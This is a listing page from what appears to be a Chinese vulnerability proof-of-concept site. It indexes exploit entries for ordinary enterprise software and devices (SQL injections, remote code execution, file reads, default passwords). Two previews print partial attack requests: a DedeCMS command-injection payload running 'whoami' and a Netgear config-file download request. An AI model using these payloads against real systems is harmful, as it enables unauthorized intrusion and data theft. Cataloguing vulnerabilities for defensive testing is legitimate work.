POC 第16页
【通用】万户 ezOFFICE selectAmountField SQL 注入_秃兔安全

【通用】万户 ezOFFICE selectAmountField SQL 注入

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
01536
DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞_秃兔安全

DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞

GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20whoami}} HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
015315
金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞_秃兔安全
Netgear-WN604接口downloadFile.php信息泄露漏洞_秃兔安全

Netgear-WN604接口downloadFile.php信息泄露漏洞

GET /downloadFile.php?file=config HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Accept...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01528
【通用】圣乔ERP系统 ResultSetConvertor 存在SQL注入_秃兔安全

【通用】圣乔ERP系统 ResultSetConvertor 存在SQL注入

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证   
【通用】FREEDOM-Administration 默认密码漏洞_秃兔安全

【通用】FREEDOM-Administration 默认密码漏洞

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
01515
【通用】微信活码系统 updateInfos 前台未授权任意用户密码修改_秃兔安全

【通用】微信活码系统 updateInfos 前台未授权任意用户密码修改

fofa语句yakit uuid:密码重置过于敏感,为了只进行验证检测条件会略显宽松pocyakitnuclei已验证
锐捷 RG-NBS2026G-P 交换机WEB 管理ping.htm未授权访问漏洞_秃兔安全
【通用】用友NC qrySubPurchaseOrgByParentPk  SQL注入_秃兔安全

【通用】用友NC qrySubPurchaseOrgByParentPk SQL注入

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
015115
H3C网络管理系统任意文件读取漏洞_秃兔安全